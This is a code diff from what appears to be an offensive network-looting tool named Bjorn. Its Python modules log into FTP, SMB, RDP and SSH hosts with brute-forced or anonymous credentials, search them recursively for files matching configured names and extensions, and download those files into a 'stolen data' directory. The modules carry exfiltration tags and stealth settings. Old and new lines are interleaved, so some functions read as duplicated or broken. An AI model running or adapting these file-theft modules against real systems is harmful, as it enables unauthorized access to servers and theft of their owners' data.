self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Credentials (creds table) --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
"""
Establish an FTP connection.
Return list[(user,password)] from DB.creds for this target.
Prefer exact IP; also include by MAC if known. Dedup preserves order.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='ftp'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='ftp'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# -------- FTP helpers --------
def connect_ftp(self, ip: str, username: str, password: str) -> Optional[FTP]:
try:
ftp = FTP()
ftp.connect(ip, 21)
ftp.connect(ip, b_port, timeout=10)
ftp.login(user=username, passwd=password)
self.ftp_connected = True
logger.info(f"Connected to {ip} via FTP with username {username}")
logger.info(f"Connected to {ip} via FTP as {username}")
return ftp
except Exception as e:
logger.error(f"FTP connection error for {ip} with user '{username}' and password '{password}': {e}")
logger.info(f"FTP connect failed {ip} {username}:{password}: {e}")
return None
def find_files(self, ftp, dir_path):
"""
Find files in the FTP share based on the configuration criteria.
"""
files = []
def find_files(self, ftp: FTP, dir_path: str) -> List[str]:
files: List[str] = []
try:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
ftp.cwd(dir_path)
items = ftp.nlst()
for item in items:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
try:
ftp.cwd(item)
ftp.cwd(item) # if ok -> directory
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
ftp.cwd('..')
except Exception:
if any(item.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in item for file_name in self.shared_data.steal_file_names):
# not a dir => file candidate
if any(item.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
any(name in item for name in (self.shared_data.steal_file_names or [])):
files.append(os.path.join(dir_path, item))
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
except Exception as e:
logger.error(f"Error accessing path {dir_path} on FTP: {e}")
logger.error(f"FTP path error {dir_path}: {e}")
raise
return files
def steal_file(self, ftp, remote_file, local_dir):
"""
Download a file from the FTP server to the local directory.
"""
def steal_file(self, ftp: FTP, remote_file: str, base_dir: str) -> None:
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
ftp.retrbinary(f'RETR {remote_file}', f.write)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from FTP: {e}")
logger.error(f"FTP download error {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the FTP server.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesFTP"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get FTP credentials from the cracked passwords file
ftpfile = self.shared_data.ftpfile
credentials = []
if os.path.exists(ftpfile):
with open(ftpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4])) # Username and password
logger.info(f"Found {len(credentials)} credentials for {ip}")
def try_anonymous_access():
"""
Try to access the FTP server without credentials.
"""
self.shared_data.bjorn_orch_status = b_class
try:
ftp = self.connect_ftp(ip, 'anonymous', '')
return ftp
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None
port_i = int(port)
except Exception:
port_i = b_port
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} FTP credentials in DB for {ip}")
def try_anonymous() -> Optional[FTP]:
return self.connect_ftp(ip, 'anonymous', '')
if not creds and not try_anonymous():
logger.error(f"No FTP credentials for {ip}. Skipping.")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no FTP connection is established.
"""
def _timeout():
if not self.ftp_connected:
logger.error(f"No FTP connection established within 4 minutes for {ip}. Marking as failed.")
logger.error(f"No FTP connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer = Timer(240, _timeout)
timer.start()
# Attempt anonymous access first
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
ftp = try_anonymous_access()
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/anonymous")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Attempt to steal files using each credential if anonymous access fails
for username, password in credentials:
if self.stop_execution:
# Anonymous first
ftp = try_anonymous()
if ftp:
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/anonymous")
if files:
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(ftp, remote, local_dir)
logger.success(f"Stole {len(files)} files from {ip} via anonymous")
success = True
try:
ftp.quit()
except Exception:
pass
if success:
timer.cancel()
return 'success'
# Authenticated creds
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
logger.info(f"Trying FTP {username}:{password} @ {ip}")
ftp = self.connect_ftp(ip, username, password)
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/{username}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
if not ftp:
continue
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/{username}")
if files:
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(ftp, remote_file, local_dir)
self.steal_file(ftp, remote, local_dir)
logger.info(f"Stole {len(files)} files from {ip} as {username}")
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} with user '{username}'")
try:
ftp.quit()
except Exception:
pass
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"FTP loot error {ip} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ftp = StealFilesFTP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,184 +0,0 @@
"""
steal_files_rdp.py - This script connects to remote RDP servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import subprocess
import logging
import time
from threading import Timer
from rich.console import Console
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_rdp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesRDP"
b_module = "steal_files_rdp"
b_status = "steal_files_rdp"
b_parent = "RDPBruteforce"
b_port = 3389
class StealFilesRDP:
"""
Class to handle the process of stealing files from RDP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.rdp_connected = False
self.stop_execution = False
logger.info("StealFilesRDP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_rdp(self, ip, username, password):
"""
Establish an RDP connection.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("RDP connection attempt interrupted due to orchestrator exit.")
return None
command = f"xfreerdp /v:{ip} /u:{username} /p:{password} /drive:shared,/mnt/shared"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.info(f"Connected to {ip} via RDP with username {username}")
self.rdp_connected = True
return process
else:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {stderr.decode()}")
return None
except Exception as e:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {e}")
return None
def find_files(self, client, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
# Assuming that files are mounted and can be accessed via SMB or locally
files = []
for root, dirs, filenames in os.walk(dir_path):
for file in filenames:
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(root, file))
logger.info(f"Found {len(files)} matching files in {dir_path}")
return files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
return []
def steal_file(self, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.basename(remote_file))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
command = f"cp {remote_file} {local_file_path}"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
else:
logger.error(f"Error downloading file {remote_file}: {stderr.decode()}")
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using RDP.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesRDP"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get RDP credentials from the cracked passwords file
rdpfile = self.shared_data.rdpfile
credentials = []
if os.path.exists(rdpfile):
with open(rdpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no RDP connection is established.
"""
if not self.rdp_connected:
logger.error(f"No RDP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
client = self.connect_rdp(ip, username, password)
if client:
remote_files = self.find_files(client, '/mnt/shared')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"rdp/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
client.terminate()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_rdp = StealFilesRDP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,223 +1,252 @@
"""
steal_files_smb.py — SMB file looter (DB-backed).
SQL mode:
- Orchestrator provides (ip, port) after parent success (SMBBruteforce).
- DB.creds (service='smb') provides credentials; 'database' column stores share name.
- Also try anonymous (''/'').
- Output under: {data_stolen_dir}/smb/{mac}_{ip}/{share}/...
"""
import os
import logging
from rich.console import Console
from threading import Timer
import time
from threading import Timer
from typing import List, Tuple, Dict, Optional
from smb.SMBConnection import SMBConnection
from smb.base import SharedFile
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_smb.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSMB"
b_module = "steal_files_smb"
b_status = "steal_files_smb"
b_parent = "SMBBruteforce"
b_port = 445
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$', 'Sharename', '---------', 'SMB1'}
class StealFilesSMB:
"""
Class to handle the process of stealing files from SMB shares.
"""
def __init__(self, shared_data):
try:
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.smb_connected = False
self.stop_execution = False
self.IGNORED_SHARES = set(self.shared_data.ignored_smb_shares or [])
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesSMB initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_smb(self, ip, username, password):
# -------- Identity cache --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Creds (grouped by share) --------
def _get_creds_by_share(self, ip: str, port: int) -> Dict[str, List[Tuple[str, str]]]:
"""
Establish an SMB connection.
Returns {share: [(user,pass), ...]} from DB.creds (service='smb', database=share).
Prefer IP; also include MAC if known. Dedup per share.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='smb'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='smb'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
out: Dict[str, List[Tuple[str, str]]] = {}
seen: Dict[str, set] = {}
for row in (by_ip + by_mac):
share = str(row.get("database") or "").strip()
user = str(row.get("user") or "").strip()
pwd = str(row.get("password") or "").strip()
if not user or not share:
continue
if share not in out:
out[share], seen[share] = [], set()
if (user, pwd) in seen[share]:
continue
seen[share].add((user, pwd))
out[share].append((user, pwd))
return out
# -------- SMB helpers --------
def connect_smb(self, ip: str, username: str, password: str) -> Optional[SMBConnection]:
try:
conn = SMBConnection(username, password, "Bjorn", "Target", use_ntlm_v2=True, is_direct_tcp=True)
conn.connect(ip, 445)
logger.info(f"Connected to {ip} via SMB with username {username}")
conn.connect(ip, b_port)
self.smb_connected = True
logger.info(f"Connected SMB {ip} as {username}")
return conn
except Exception as e:
logger.error(f"SMB connection error for {ip} with user '{username}' and password '{password}': {e}")
logger.error(f"SMB connect error {ip} {username}: {e}")
return None
def find_files(self, conn, share_name, dir_path):
"""
Find files in the SMB share based on the configuration criteria.
"""
files = []
try:
for file in conn.listPath(share_name, dir_path):
if file.isDirectory:
if file.filename not in ['.', '..']:
files.extend(self.find_files(conn, share_name, os.path.join(dir_path, file.filename)))
else:
if any(file.filename.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file.filename for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(dir_path, file.filename))
logger.info(f"Found {len(files)} matching files in {dir_path} on share {share_name}")
except Exception as e:
logger.error(f"Error accessing path {dir_path} in share {share_name}: {e}")
return files
def steal_file(self, conn, share_name, remote_file, local_dir):
"""
Download a file from the SMB share to the local directory.
"""
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share_name, remote_file, f)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from share {share_name}: {e}")
def list_shares(self, conn):
"""
List shares using the SMBConnection object.
"""
def list_shares(self, conn: SMBConnection):
try:
shares = conn.listShares()
valid_shares = [share for share in shares if share.name not in IGNORED_SHARES and not share.isSpecial and not share.isTemporary]
logger.info(f"Found valid shares: {[share.name for share in valid_shares]}")
return valid_shares
return [s for s in shares if (s.name not in self.IGNORED_SHARES and not s.isSpecial and not s.isTemporary)]
except Exception as e:
logger.error(f"Error listing shares: {e}")
logger.error(f"list_shares error: {e}")
return []
def execute(self, ip, port, row, status_key):
"""
Steal files from the SMB share.
"""
def find_files(self, conn: SMBConnection, share: str, dir_path: str) -> List[str]:
files: List[str] = []
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSMB"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get SMB credentials from the cracked passwords file
smbfile = self.shared_data.smbfile
credentials = {}
if os.path.exists(smbfile):
with open(smbfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
share = parts[3]
user = parts[4]
password = parts[5]
if share not in credentials:
credentials[share] = []
credentials[share].append((user, password))
logger.info(f"Found credentials for {len(credentials)} shares on {ip}")
def try_anonymous_access():
"""
Try to access SMB shares without credentials.
"""
try:
conn = self.connect_smb(ip, '', '')
shares = self.list_shares(conn)
return conn, shares
for entry in conn.listPath(share, dir_path):
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
if entry.isDirectory:
if entry.filename not in ('.', '..'):
files.extend(self.find_files(conn, share, os.path.join(dir_path, entry.filename)))
else:
name = entry.filename
if any(name.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
any(sn in name for sn in (self.shared_data.steal_file_names or [])):
files.append(os.path.join(dir_path, name))
return files
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None, None
logger.error(f"SMB path error {share}:{dir_path}: {e}")
raise
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def steal_file(self, conn: SMBConnection, share: str, remote_file: str, base_dir: str) -> None:
try:
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share, remote_file, f)
logger.success(f"Downloaded {share}:{remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"SMB download error {share}:{remote_file}: {e}")
def timeout():
"""
Timeout function to stop the execution if no SMB connection is established.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
creds_by_share = self._get_creds_by_share(ip, port_i)
logger.info(f"Found SMB creds for {len(creds_by_share)} share(s) in DB for {ip}")
def _timeout():
if not self.smb_connected:
logger.error(f"No SMB connection established within 4 minutes for {ip}. Marking as failed.")
logger.error(f"No SMB connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer = Timer(240, _timeout)
timer.start()
# Attempt anonymous access first
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
conn, shares = try_anonymous_access()
if conn and shares:
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
remote_files = self.find_files(conn, share.name, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share.name}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
# Anonymous first (''/'')
try:
conn = self.connect_smb(ip, '', '')
if conn:
shares = self.list_shares(conn)
for s in shares:
files = self.find_files(conn, s.name, '/')
if files:
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{s.name}")
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(conn, share.name, remote_file, local_dir)
self.steal_file(conn, s.name, remote, base)
logger.success(f"Stole {len(files)} files from {ip} via anonymous on {s.name}")
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
try:
conn.close()
except Exception:
pass
except Exception as e:
logger.info(f"Anonymous SMB failed on {ip}: {e}")
if success:
timer.cancel() # Cancel the timer if the operation is successful
timer.cancel()
return 'success'
# Track which shares have already been accessed anonymously
attempted_shares = {share.name for share in shares} if success else set()
# Attempt to steal files using each credential for shares not accessed anonymously
for share, creds in credentials.items():
if share in attempted_shares or share in IGNORED_SHARES:
# Per-share credentials
for share, creds in creds_by_share.items():
if share in self.IGNORED_SHARES:
continue
for username, password in creds:
if self.stop_execution:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for share {share} on {ip}")
conn = self.connect_smb(ip, username, password)
if conn:
remote_files = self.find_files(conn, share, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
if not conn:
continue
files = self.find_files(conn, share, '/')
if files:
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{share}")
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(conn, share, remote_file, local_dir)
self.steal_file(conn, share, remote, base)
logger.info(f"Stole {len(files)} files from {ip} share={share} as {username}")
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} on share '{share}' with user '{username}'")
try:
conn.close()
except Exception:
pass
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} on share '{share}' with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
timer.cancel()
return 'success'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"SMB loot error {ip} {share} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_smb = StealFilesSMB(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,173 +1,330 @@
"""
steal_files_ssh.py - This script connects to remote SSH servers using provided credentials, searches for specific files, and downloads them to a local directory.
steal_files_ssh.py — SSH file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) and ensures parent action success (SSHBruteforce).
- SSH credentials are read from the DB table `creds` (service='ssh').
- IP -> (MAC, hostname) mapping is read from the DB table `hosts`.
- Looted files are saved under: {shared_data.data_stolen_dir}/ssh/{mac}_{ip}/...
- Paramiko logs are silenced to avoid noisy banners/tracebacks.
Parent gate:
- Orchestrator enforces parent success (b_parent='SSHBruteforce').
- This action runs once per eligible target (alive, open port, parent OK).
"""
import os
import paramiko
import logging
import time
from rich.console import Console
import logging
import paramiko
from threading import Timer
from typing import List, Tuple, Dict, Optional
from shared import SharedData
from logger import Logger
# Configure the logger
# Logger for this module
logger = Logger(name="steal_files_ssh.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSSH"
b_module = "steal_files_ssh"
b_status = "steal_files_ssh"
b_parent = "SSHBruteforce"
b_port = 22
# Silence Paramiko's internal logs (no "Error reading SSH protocol banner" spam)
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys"):
logging.getLogger(_name).setLevel(logging.CRITICAL)
b_class = "StealFilesSSH" # Unique action identifier
b_module = "steal_files_ssh" # Python module name (this file without .py)
b_status = "steal_files_ssh" # Human/readable status key (free form)
b_action = "normal" # 'normal' (per-host) or 'global'
b_service = ["ssh"] # Services this action is about (JSON-ified by sync_actions)
b_port = 22 # Preferred target port (used if present on host)
# Trigger strategy:
# - Prefer to run as soon as SSH credentials exist for this MAC (on_cred_found:ssh).
# - Also allow starting when the host exposes SSH (on_service:ssh),
# but the requirements below still enforce that SSH creds must be present.
b_trigger = 'on_any:["on_cred_found:ssh","on_service:ssh"]'
# Requirements (JSON string):
# - must have SSH credentials on this MAC
# - must have port 22 (legacy fallback if port_services is missing)
# - limit concurrent running actions system-wide to 2 for safety
b_requires = '{"all":[{"has_cred":"ssh"},{"has_port":22},{"max_concurrent":2}]}'
# Scheduling / limits
b_priority = 70 # 0..100 (higher processed first in this schema)
b_timeout = 900 # seconds before a pending queue item expires
b_max_retries = 1 # minimal retries; avoid noisy re-runs
b_cooldown = 86400 # seconds (per-host cooldown between runs)
b_rate_limit = "3/86400" # at most 3 executions/day per host (extra guard)
# Risk / hygiene
b_stealth_level = 6 # 1..10 (higher = more stealthy)
b_risk_level = "high" # 'low' | 'medium' | 'high'
b_enabled = 1 # set to 0 to disable from DB sync
# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "ssh", "loot"]
class StealFilesSSH:
"""
Class to handle the process of stealing files from SSH servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sftp_connected = False
self.stop_execution = False
logger.info("StealFilesSSH initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
"""StealFilesSSH: connects via SSH using known creds and downloads matching files."""
def connect_ssh(self, ip, username, password):
"""
Establish an SSH connection.
"""
def __init__(self, shared_data: SharedData):
"""Init: store shared_data, flags, and build an IP->(MAC, hostname) cache."""
self.shared_data = shared_data
self.sftp_connected = False # flipped to True on first SFTP open
self.stop_execution = False # global kill switch (timer / orchestrator exit)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesSSH initialized")
# --------------------- Identity cache (hosts) ---------------------
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
"""Return MAC for IP using the local cache (refresh on miss)."""
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
"""Return current hostname for IP using the local cache (refresh on miss)."""
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Credentials (creds table) ---------------------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
"""
Fetch SSH creds for this target from DB.creds.
Strategy:
- Prefer rows where service='ssh' AND ip=target_ip AND (port is NULL or matches).
- Also include rows for same MAC (if known), still service='ssh'.
Returns list of (username, password), deduplicated.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
# Pull by IP
by_ip = self.shared_data.db.query(
"""
